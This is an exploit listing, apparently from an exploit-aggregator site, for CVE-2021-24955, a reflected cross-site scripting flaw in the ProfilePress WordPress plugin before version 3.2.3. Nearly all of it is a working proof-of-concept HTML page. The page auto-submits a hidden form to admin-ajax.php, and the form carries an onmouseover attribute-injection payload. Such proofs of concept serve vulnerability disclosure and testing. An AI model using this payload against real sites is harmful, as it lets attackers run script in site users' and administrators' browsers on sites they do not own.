Exploit for ProfilePress < 3.2.3 - Reflected Cross-Site Scripting CVE-2021-24955

Name: Exploit for ProfilePress < 3.2.3 - Reflected Cross-Site Scripting CVE-2021-24955
Rating: 5 (69 reviews)

2021-11-15 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:E8005D4D-41C3-451D-B85A-2626DECAA080
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="pp_get_forms_by_builder_type" />
      <input type="hidden" name="data" value='" onmouseover=alert(/XSS/) style=display:block;height:1000px;width:1000px; t="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>